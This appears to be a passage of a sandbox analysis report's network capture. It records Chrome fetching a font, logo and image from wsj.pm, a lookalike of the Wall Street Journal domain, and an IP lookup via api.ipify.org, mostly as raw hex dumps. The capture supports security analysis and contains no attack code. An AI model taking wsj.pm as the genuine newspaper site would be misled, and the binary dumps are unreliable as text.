                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 24 0e 01 41 84 db 86 31 7d 4c aa af 66 df 8e 39 5a 27 56 b0 e0 13 29 2c 2b ab f6 c4 a8 fc a5 42 01 1d 76 fd 3a 67 6a 37 84 b3 a0 b4 e6 db dc c2 78 0b b4 6b c6 0f a3 0a e1 8d 47 28 df 53 95 25 45 98 e8 42 59 f0 fe b0 7f f9 ca dd fe ed a2 20 0b 59 24 f7 1a 59 08 08 0a 56 8e 4c c7 0f ea 99 c4 f4 0f a4 e8 72 ff 20 93 2b dc 93 13 7a 1e f1 51 d3 5e 6a 9b 82 c6 3f 09 80 2b b4 c8 b4 06 11 cf 8d 3f e5 1f 21 e6 52 da 52 f0 45 79 04 61 f0 c1 34 f0 03 52 0f 76 fd 21 07 92 3f 8f 61 da 99 ca 74 ba 54 06 38 8d 10 6c b1 dc 6d d8 a5 2a 64 88 1f d7 6b 20 f5 2b 67 5a 83 8f 76 e1 fd 21 0a 18 75 1a ce f9 8e b1 f9 a6 e1 af 3d 20 0e 49 c5 84 20 6c 2d ee 97 bf c8 c1 b2 aa 35 ce 22 b3 41 e8 22 17 1a 96 02 37 ef 58 4c 17 05 31 e7 bb ac f6 ba 74 f3 75 32 c6 f0 23 0e 69 4a 9f cd 79
                                                                                                                Data Ascii: $A1}Lf9Z'V),+Bv:gj7xkG(S%EBY Y$YVLr +zQ^j?+?!RREya4Rv!?atT8lm*dk +gZv!u= I l-5"A"7XL1tu2#iJy
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 92 11 24 54 2f f6 15 01 a5 d6 9c 5f 47 f1 d5 b4 8d df 72 83 09 02 7d 0f 82 1e a3 ac d1 97 94 8b be 69 b1 e7 b9 89 57 d9 3d a6 3c aa a9 26 85 90 89 a0 e7 9f 0a 3d bb 4e 51 eb 69 62 c6 ba 28 ce ab cb 92 8a 28 f5 66 98 1b 19 33 f8 4a e5 49 f7 48 59 06 3c 14 dc 1e ad c4 5e 23 bd 45 b3 7d a1 d4 d3 2c e2 e3 4d eb 66 69 5f 5c de 12 8a 57 f7 81 12 ee 47 0e 23 7c 5a 85 0b 67 03 32 04 97 a4 55 4b ab c5 ff 8b 89 91 0b 19 bf 24 49 d9 6f 21 41 03 de 76 66 42 1e 02 70 16 5d 3a a5 29 27 03 a1 2d 71 64 af 8d 7b 7f b9 d7 eb 35 73 62 a5 2d 99 5c d8 3d a4 29 1c bd 6b 6a a8 a5 a7 c3 e8 74 13 e9 2d bb 71 d2 6d f5 61 1b 86 3a ce 70 01 ab e5 0a 82 ed 95 43 a8 11 d4 be 28 67 4c 1f 7b 5b b9 46 8e a7 b6 da 01 4f bc 43 cf 6d 4f 00 82 06 62 c0 5d 8a ee 02 79 18 d6 32 df fd 78 4b 2a
                                                                                                                Data Ascii: $T/_Gr}iW=<&=NQib((f3JIHY<^#E},Mfi_\WG#|Zg2UK$Io!AvfBp]:)'-qd{5sb-\=)kjt-qma:pC(gL{[FOCmOb]y2xK*
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: f1 1c 95 42 ad 8a 7b 97 65 e8 dd 7a b2 5f 93 ea 5c aa 62 eb 51 f9 e4 6c 31 bf 39 fd fd c8 51 be 0e 47 c7 74 b7 c8 75 55 53 2f 37 88 d0 ad 71 9f 5e 5e e3 e4 5d ec 16 a1 e4 af 64 bd 5a cd 6c 37 8b 19 e6 17 7d fd be 1f 9d 77 4d 5a 10 6d 63 48 29 4e db 34 52 7e 10 3f ce 57 e8 91 dd d5 22 96 96 ba 45 b4 56 e2 b7 56 5f 22 6e f6 cd ef 1d ed 99 b1 2f 5a 76 71 17 9b fd 2f b1 2c 61 97 e7 08 19 19 df 07 de 99 26 1b 73 b0 47 a6 90 9f 45 6a 19 3f 4b 71 59 a6 d0 f2 fd d8 61 be 42 4f 1b 5f bc 51 09 d2 f0 d3 95 69 8a c5 f9 d6 45 ed d6 b4 b1 78 79 ae a6 c7 ed 51 5c a3 25 35 a5 37 f3 38 e3 92 b7 0e f2 5a 39 f7 28 60 2e 5a f3 16 a9 29 b9 78 8d 51 3f d1 93 75 ac 83 07 4c 10 58 f6 96 71 ab 0f 30 e2 c1 e5 87 18 2b df b2 59 f1 61 2b f7 d2 96 1d f4 ed ce 13 ed ba de 66 c4 e9 37
                                                                                                                Data Ascii: B{ez_\bQl19QGtuUS/7q^^]dZl7}wMZmcH)N4R~?W"EVV_"n/Zvq/,a&sGEj?KqYaBO_QiExyQ\%578Z9(`.Z)xQ?uLXq0+Ya+f7
                                                                                                                2024-04-25 14:58:19 UTC17INData Raw: a7 00 af 8f aa e0 74 77 97 87 95 c1 a1 54 a2 3d f1
                                                                                                                Data Ascii: twT=


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.1749737104.26.12.2054436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:19 UTC535OUTGET /?format=json HTTP/1.1
                                                                                                                Host: api.ipify.org
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Origin: https://wsj.pm
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC249INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Vary: Origin
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 879f30c7c9911361-ATL
                                                                                                                2024-04-25 14:58:19 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 7d
                                                                                                                Data Ascii: {"ip":"185.152.66.230"}


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.1749734103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:19 UTC558OUTGET /fonts/woffs/exchange/Exchange-Medium.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
                                                                                                                ETag: "ff55-5e34c95a213c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 65365
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:19 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 ff 55 00 12 00 00 00 03 f4 54 00 00 fe 27 00 01 00 00 00 00 fe 90 00 00 00 c5 00 00 01 eb 00 00 00 00 00 00 00 00 19 3a 1a 82 1e 1b 81 fe 2c 1c d3 4c 06 60 00 92 46 08 81 4c 09 9a 16 11 08 0a 8b cf 44 8b 80 3d 01 36 02 24 03 9d 3e 0b 9e 3c 00 04 20 05 8e 7d 07 c5 46 0c 81 3c 5b 53 bc b3 08 be df 90 dd fb ee 52 59 13 36 b0 55 11 84 ad 82 ec 26 55 fd 86 33 30 53 1f ea 04 3a 87 ed 08 82 fe 3a c7 a6 1c 3d 17 ab 89 2b f9 0d dc a6 13 ac 8a df 6d 03 20 ae d6 90 73 19 d9 ff ff ff ff ff ff ff ff ff ff 4d 24 3f 44 36 ff ee 92 be 4b 92 96 b6 d0 02 a5 c0 c0 52 41 9d 9f 21 53 c1 b9 0d f7 dd dc 08 4a 8e f9 10 53 ca 78 18 88 c8 c9 71 b5 59 88 e5 70 54 d5 e3 89 77 53 0a 0d 29 cd 64 6f 30 96 d5 b8 1d c2 64 2e 2c f8 d2 ce 27 d9 59 5b d1 5a b8
                                                                                                                Data Ascii: wOF2UT':,L`FLD=6$>< }F<[SRY6U&U30S::=+m sM$?D6KRA!SJSxqYpTwS)do0d.,'Y[Z
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: cf e3 6d 7f 73 8b 60 47 0f 30 e2 cf e9 6c a3 e5 45 6e 82 77 7e e1 01 e3 18 f6 5b 90 d9 ea 9d 6b 17 d8 32 07 a7 b4 a0 3a bb 98 14 46 c7 94 92 2d 17 eb 9c 8c 0a ff 2a 97 45 e0 2c 25 a6 89 4c 15 89 42 d6 95 d5 c3 bf 0e 8f e7 d2 14 97 43 54 45 44 51 8a ab 55 a5 4b af ec 39 3d 97 20 4e 5e 67 c6 d6 52 01 f3 7b 84 7a e4 91 a5 02 bb 2d 54 e9 e1 fb 2b d9 07 c2 87 83 0b 23 59 a5 f4 e7 50 b7 95 0a c8 35 81 7c ec de 94 55 ea f3 25 e2 9f d7 82 ce 0a 51 cb c6 b1 f4 e9 7f cc 54 9f 5b 58 ce 3e 38 ad 61 05 c7 53 32 c7 bd c4 b7 d7 bf e3 8b 2d 41 03 15 d5 5b 8f 0a f9 2e f5 93 5e 94 b3 8c 29 d4 10 f2 46 50 18 59 9f eb 55 98 c6 80 97 78 aa 49 ce fc 8f 67 22 59 a1 30 ce 4f b8 ce e0 22 88 8c 54 14 05 50 da ba 87 29 1d 99 1c d7 54 3c b2 10 5a 37 f6 59 44 7a 94 ab 5e e3 2c 88 b4
                                                                                                                Data Ascii: ms`G0lEnw~[k2:F-*E,%LBCTEDQUK9= N^gR{z-T+#YP5|U%QT[X>8aS2-A[.^)FPYUxIg"Y0O"TP)T<Z7YDz^,
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: a0 09 40 0b 80 36 00 1d 00 ba 40 82 e2 37 40 57 a3 68 9b 9a 18 66 0c 64 29 06 79 34 a9 e7 9b 36 0d 16 c8 c4 8d db d8 95 ee 00 4c 3a 2f 60 8d e4 15 39 18 76 9d cb 5d e4 68 af ef f3 d3 81 bb 68 d2 ef 47 f1 a9 06 17 38 a0 d2 39 2b 71 04 5e f9 ca 4e 25 07 22 19 b0 49 66 b8 53 68 4c 24 bf 00 00 2f df c9 8a 1d 7d 11 d8 39 72 06 3a 4c 9c 8d 12 2f 4c 8d 97 d2 05 da 1b 5d c3 4b 31 15 21 ce bc ad af 60 cc 1d ee a1 d5 18 91 2f 89 61 37 cb 87 89 4c 24 23 4e dd 41 b5 b5 84 fe d2 b3 bf fa 38 a4 5e 83 48 18 20 24 74 a6 22 43 d3 64 b5 28 85 00 5d b9 4e df 95 9b f9 68 f5 d4 50 48 90 52 3f fc c7 81 31 66 79 18 7f b2 d7 e5 a3 fb c9 c2 e5 56 c3 10 ad 33 88 92 4b 06 65 dc f4 2b d8 8b 3c 0d b2 ca ef 19 eb 60 4c 73 21 67 9e 37 26 7b 31 f7 c7 d3 10 eb 50 7e 5c 59 00 8a 20 e3 bc
                                                                                                                Data Ascii: @6@7@Whfd)y46L:/`9v]hhG89+q^N%"IfShL$/}9r:L/L]K1!`/a7L$#NA8^H $t"Cd(]NhPHR?1fyV3Ke+<`Ls!g7&{1P~\Y
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: ef db 8e 01 73 de b1 26 57 3b 57 5f 85 fd ae aa dc d9 ce fa 86 f3 65 bb 77 bf fd 67 c3 df 57 c5 ff 9b 12 53 8c f9 9e aa db 81 59 09 a7 0e d9 fc 6f 4e 4a 49 cb f7 70 bc 0e 2c 10 af f8 dd 81 fc 17 85 ec 46 d6 85 90 29 73 f4 c2 15 cc 1f 23 c5 79 2d e9 b1 e3 6b 8c ce 1c 05 5f 42 df 3d c9 cb 5d fb da dd 06 f6 67 32 4f 7a f4 6a ae e3 a2 18 aa 4c 0d 9f 97 1c f7 18 93 f6 0c f7 35 39 a6 81 89 bf e3 86 6f cc b7 87 60 f5 14 51 47 7a 46 56 83 7d 35 9d f4 8a 3c 17 92 c8 e3 5a bc 79 d9 80 c1 12 2a 51 a4 d8 08 2a 9e 8c e4 8b 20 3f 9f 03 29 f8 27 19 87 b3 2d 66 95 be 87 78 bc e3 7a dc fe b3 94 6c 74 a7 87 30 bf 77 57 93 49 73 24 78 b6 c8 21 0d d7 94 df 92 28 8f ad 89 94 d1 23 9e b3 94 d6 26 03 b9 51 25 50 3d 27 0f f7 a5 27 aa 05 72 f2 3e eb 19 bb 27 4c 0a bd 80 f7 ab c2
                                                                                                                Data Ascii: s&W;W_ewgWSYoNJIp,F)s#y-k_B=]g2OzjL59o`QGzFV}5<Zy*Q* ?)'-fxzlt0wWIs$x!(#&Q%P=''r>'L
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 6b 7f 99 b4 7b 6f 76 23 e2 e5 49 71 12 ab 07 e1 9b 61 28 65 0b d3 12 a4 51 89 9e 7b 61 59 01 63 2c 91 cf 13 cb c7 d4 fb 23 a1 b7 d9 64 b5 78 b2 6a 6e 6f 43 c2 8f c1 c1 cf e2 6f 98 df cd df 43 0e f3 2c b3 b8 cf c0 f1 94 21 b7 dd ee 79 be 79 3b 02 7d 33 7e 2c 6d 47 87 f5 58 e7 e2 f8 33 65 fb 4b 4e 0d ca c7 46 2b a2 8f 5e 62 3e da bc 11 e9 0e db 1b 6e e3 8d a3 48 f8 65 38 f8 df 02 64 62 6a 8a bf ba 9d a1 88 64 28 e9 e5 fe ea d4 14 3f 8f fd 90 37 9d c5 f9 17 1c 4f 06 79 f4 86 02 7b f3 b1 e0 86 27 93 34 91 e1 8c 2c be 05 14 e5 43 83 82 93 23 60 05 0d b3 8f d9 98 72 c1 8f 19 af 7a 27 a4 fa e6 0d 84 0e 44 07 e3 23 ce b4 81 c0 35 8f 6f 07 a7 fa d1 82 98 82 7d 23 b6 20 e9 47 0f 98 cb 77 3a 3d b9 ad df 6e 47 22 5e c0 c1 4f 3f f7 75 1a b6 b7 0e 49 db 86 8e 29 cc 3e
                                                                                                                Data Ascii: k{ov#Iqa(eQ{aYc,#dxjnoCoC,!yy;}3~,mGX3eKNF+^b>nHe8dbjd(?7Oy{'4,C#`rz'D#5o}# Gw:=nG"^O?uI)>
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: e7 b8 65 14 34 53 18 b5 2f bf 68 1c 12 24 43 37 6f 92 e3 b4 f9 99 f6 27 25 42 bb 4f 39 dd 78 e1 3b fe 7c e1 2f 42 e6 46 4b e6 d6 a7 b0 83 d0 95 ad 67 c5 bf 77 68 df d9 ed f5 24 87 68 36 18 ca dd e9 3a 39 3b 21 3c 35 94 fc e9 41 7f 09 15 97 fb db 5d 81 d7 66 37 ec 36 b1 a2 88 81 a1 4b 14 7a ff 71 f5 ad 44 a1 bf 92 b6 51 ea c5 ee 56 15 8c 6c 71 6d f3 c9 dc e9 ca ae b4 05 7f 16 16 49 2a 2d 3a 45 83 8a 57 d6 bf b4 88 f4 f8 c2 3b 7f c7 e2 dd ca 7c 50 d8 33 35 85 5e e6 2e cb fa 82 14 5c 8c c9 b8 f5 f3 38 f0 d6 70 5e 2c da 74 17 4d 41 48 14 42 84 88 27 a4 ab 11 aa 95 49 d8 ab c9 4b aa 17 d0 61 66 0d 9e f9 f6 95 53 bf de b0 70 d8 a3 63 14 50 e2 48 2e f9 73 e5 cc 47 7f fe 8d b7 d1 e6 94 10 43 6b 92 d2 f5 6f df 5f ea 1e 8d e5 30 e2 76 8b bc 60 75 96 c1 0b ef dc c2
                                                                                                                Data Ascii: e4S/h$C7o'%BO9x;|/BFKgwh$h6:9;!<5A]f76KzqDQVlqmI*-:EW;|P35^.\8p^,tMAHB'IKafSpcPH.sGCko_0v`u
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 11 7a 56 00 06 01 84 67 0e af ca 87 49 9c 28 f6 39 61 87 33 0a ea ea 33 2b bd 5e 1b cc 52 cd b4 3c 4e 61 8a 8a 05 ee 05 2e be 6d 74 00 68 c2 55 f0 ea 08 d9 52 62 24 30 da 5c e5 79 33 57 e8 d4 0b 5c 90 fc 3e e6 f6 68 3f 16 78 6d 99 ef 40 67 8a 53 33 81 8c 57 21 f7 e5 e8 20 dd d4 5c eb e1 9d cd 98 75 01 ae 79 fd db 4a 08 dd 51 a8 21 97 ca 71 67 1e d6 7a 73 a9 e6 38 78 ee 8d 55 00 e7 02 83 35 6e 75 2d 22 b1 39 a4 14 2e a6 1a 85 50 74 83 04 d2 0f 55 85 55 41 9b 41 36 d6 8f 74 e0 d1 04 01 b3 46 db 40 a1 58 8b 99 b8 e5 a1 ba 4e 3d eb 9c b6 78 3d 1f 9f c2 49 fe 70 b2 b5 a7 25 a9 0e ac b7 25 a6 e8 42 b8 3b 3c c7 70 ae 82 7a 6c f6 c8 d8 17 0f 96 0e 3a 11 79 d3 65 61 06 7f 63 81 84 9d 12 c0 03 17 00 9d 0f 12 10 7c 8d 2f 1e bf 2c fb 45 03 33 23 0e d6 f9 c1 b2 62 aa
                                                                                                                Data Ascii: zVgI(9a33+^R<Na.mthURb$0\y3W\>h?xm@gS3W! \uyJQ!qgzs8xU5nu-"9.PtUUAA6tF@XN=x=Ip%%B;<pzl:yeac|/,E3#b
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 1d b7 19 29 b1 d6 52 f2 59 53 e4 75 28 94 cf 97 55 6c 55 cd 4c ab 32 5c 01 fb 88 f0 c6 cd fd dd 71 8b 9f f3 65 e3 fe db e8 35 79 1d 32 d6 a1 fe c3 fd 51 3e 7f ba ff ee e1 bb db f3 f1 b0 5e 39 f3 f7 bf 35 a3 48 f7 5b 5b 5b d9 3b 94 86 4c f6 55 43 fc d1 fc 78 0d cc 78 c4 e6 77 09 cf 5d d8 70 d4 83 ab c4 e7 9f 3b b3 c9 d0 1a d0 ed 2d 6a dd b8 25 ab 6d 0b ad 6a 33 dc 1f 8b 18 31 ee 42 17 49 2f 43 f0 14 a2 15 ba f8 b3 c9 ef 5a 99 6f e7 3f f8 c7 b1 c4 b1 4f 8c c3 ca e7 98 f3 25 2d df b9 d6 00 7d b1 10 12 74 30 7f 03 3e 5d b7 3a 80 42 11 a3 6f b2 11 e7 6f f1 a9 ab 5b 5a ab af b6 7a 80 0c f9 b1 20 df 7d f3 d5 e7 cb f3 c3 dd e9 b8 df ad 57 8b f9 78 74 72 2e 75 42 11 53 fe c8 5b bc 7f 3f f8 f4 86 4d 71 68 4f 73 84 89 f7 5e 18 ea 79 4f 69 40 28 bd de f0 f9 4c d4 28
                                                                                                                Data Ascii: )RYSu(UlUL2\qe5y2Q>^95H[[[;LUCxxw]p;-j%mj31BI/CZo?O%-}t0>]:Boo[Zz }Wxtr.uBS[?MqhOs^yOi@(L(
                                                                                                                2024-04-25 14:58:19 UTC1425INData Raw: 08 f9 b1 b2 02 1e 19 34 8f c4 2b 0c d5 a0 84 d9 38 9d d8 37 d2 2e 3c 45 41 4a fc 0a 2f 9f 5a ab 52 d6 a9 11 f4 ad 52 96 01 3c 08 20 22 09 35 45 42 dc 2f d8 2c a2 50 6e 74 70 3e 7b 67 b8 1a da 7e c9 ab cb cc dd 2e 6e e9 bc 22 1a a2 cb 41 a0 28 e1 7d 11 b0 3b f5 87 61 47 cf 78 40 fb 36 1d 1d cf 10 5d 94 42 32 1e 9d 51 6d a9 2b a3 d2 65 19 5d ae 2a e1 fd 3a b8 6b 79 3d a9 fa b8 89 8d c0 04 13 6c 1b 30 f3 f9 67 3f 2e a2 d5 48 32 b7 94 37 a4 59 34 b5 14 65 d7 40 25 bd 6f 83 99 11 e0 35 f2 8f 3e 78 cf 27 6c 4e 4d 85 9a 80 68 0a 42 e7 86 79 e9 31 5d 49 11 c3 e1 09 82 41 66 a9 14 b2 dd 81 94 c8 18 45 38 d0 a5 8e da 26 8f 82 be ee 29 79 7d 87 ea f1 10 b7 d5 2d 27 6a a5 a3 81 1e 3a 6b 4b b0 7d 9c 6a c1 ef 85 0f b3 16 49 14 32 26 0a f6 63 3f ef ab 7d 6c 38 d6 47 11
                                                                                                                Data Ascii: 4+87.<EAJ/ZRR< "5EB/,Pntp>{g~.n"A(};aGx@6]B2Qm+e]*:ky=l0g?.H27Y4e@%o5>x'lNMhBy1]IAfE8&)y}-'j:kK}jI2&c?}l8G


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.1749735103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:19 UTC623OUTGET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC254INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Mon, 31 Aug 2020 06:54:20 GMT
                                                                                                                ETag: "1d3e-5ae26df2fdf00"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 7486
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:19 UTC7486INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 37 38 33 22 20 68 65 69 67 68 74 3d 22 31 31 32 2e 35 38 38 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 31 2e 36 35 32 20 36 31 2e 35 34 34 63 30 20 33 2e 30 32 33 2e 38 37 38 20 33 2e 36 30 37 20 32 2e 38 32 39 20 34 2e 30 39 37 6c 33 2e 30 32 33 2e 36 38 33 76 31 2e 33 36 35 48 37 2e 34 31 32 76 2d 31 2e 33 36 35 6c 32 2e 35 33 36 2d 2e 35 38 34 63 31 2e 39 35 31 2d 2e 34 38 37 20 32 2e 38 32 39 2d 31 2e 34 36 35 20 32 2e 38 32 39 2d 34 2e 31 39 33 56 32 2e 34 33 38 68 2d 32 2e 31 34 36 63 2d 36 2e 30 34 37 20 30 2d 38 2e 34 38 35 20 39 2e 38 35 31 2d 39 2e 31 36 38 20 32 30 2e 32 38 37 48 30 56 2e 34 38 38 68 33 34 2e
                                                                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="783" height="112.588"><path d="M21.652 61.544c0 3.023.878 3.607 2.829 4.097l3.023.683v1.365H7.412v-1.365l2.536-.584c1.951-.487 2.829-1.465 2.829-4.193V2.438h-2.146c-6.047 0-8.485 9.851-9.168 20.287H0V.488h34.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.1749736103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:19 UTC581OUTGET /img/wsj-social-share.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:18:50 GMT
                                                                                                                ETag: "8f91-6164904d8ba80"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 36753
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png
                                                                                                                2024-04-25 14:58:19 UTC7941INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 02 76 08 06 00 00 00 4f 40 7b 5c 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 40 00 49 44 41 54 78 01 ec dd 07 9c 5d 55 b9 f7 f1 27 99 64 52 27 c9 a4 f7 5e 26 99 0c 26 31 88 91 5e 14 54 9a 57 10 a4 78 55 8a 94 08 22 22 e0 0b 2a 58 62 44 c0 96 ab 14 11 b8 70 f5 02 ca 95 0b 0a a1 aa 28 52 a4 44 4a 7a 27 7d d2 26 65 26 6d de fb 1c 39 71 92 9c 39 b3 f6 39 bb 3c 6b 9f df fe 7c b8 c9 9c b3 f7 da cf fa ae 1d ae f9 b3 d6 da ad 1a ff ef 10 0e 04 10 40 00 01 04 10 40 00 01 04 10 40 00 01 04 10 40 00 01 04 8c 0a b4 36 5a 17 65 21 80 00 02 08 20 80 00 02 08 20 80 00 02 08 20 80 00 02 08 20 90 11 20 c0 e2 41 40 00 01 04 10 40 00 01 04 10 40 00 01 04 10 40 00 01 04 10 30 2d 40 80 65 7a 78 28 0e 01 04 10
                                                                                                                Data Ascii: PNGIHDRvO@{\sRGB@IDATx]U'dR'^&&1^TWxU""*XbDp(RDJz'}&e&m9q99<k|@@@@6Ze! A@@@@0-@ezx(
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 6f 1c 0c 6b d3 76 ed 87 6e 52 ad 6f 54 f4 e1 d0 7f 4f e9 c6 ee ba 5f 17 47 7a 04 46 8c 18 61 ae 33 04 58 e6 86 84 82 10 40 00 81 58 04 08 b0 62 61 e6 26 08 20 80 40 f1 02 16 f7 21 d1 5e f9 3a 03 4b 97 3e f6 e8 d1 a3 f8 81 09 b9 05 7d bb 5b a9 1f 3d 7b f6 2c 88 40 67 af e9 1b 1c 93 3a 7e fa d3 9f ca 9b 6f be 19 ea ed 75 83 f4 d6 ad fd f9 9f 6b 03 07 0e 94 19 33 66 88 6e f0 ce 91 0e 01 8b 81 64 a1 ff 8e 48 c7 88 d0 0b 04 10 40 a0 74 05 fc f9 5f 44 a5 3b 46 f4 1c 01 04 10 c8 08 e8 32 42 8b 87 ce ba f0 f5 38 f8 e0 83 cd 95 ee b3 67 58 98 dd ba 75 2b a8 a9 23 8f 3c 52 74 73 e7 24 8e 45 8b 16 c9 cf 7e f6 b3 50 6f ad c1 d5 e9 a7 9f 1e 6a 9b 71 34 a6 b3 1b 2f b8 e0 82 38 6e c5 3d 62 10 b0 18 aa b7 6f df 3e 86 9e 73 0b 04 10 40 00 01 6b 02 04 58 d6 46 84 7a 10 40
                                                                                                                Data Ascii: okvnRoTO_GzFa3X@Xba& @!^:K>}[={,@g:~ouk3fndH@t_D;F2B8gXu+#<Rts$E~Pojq4/8n=bo>s@kXFz@
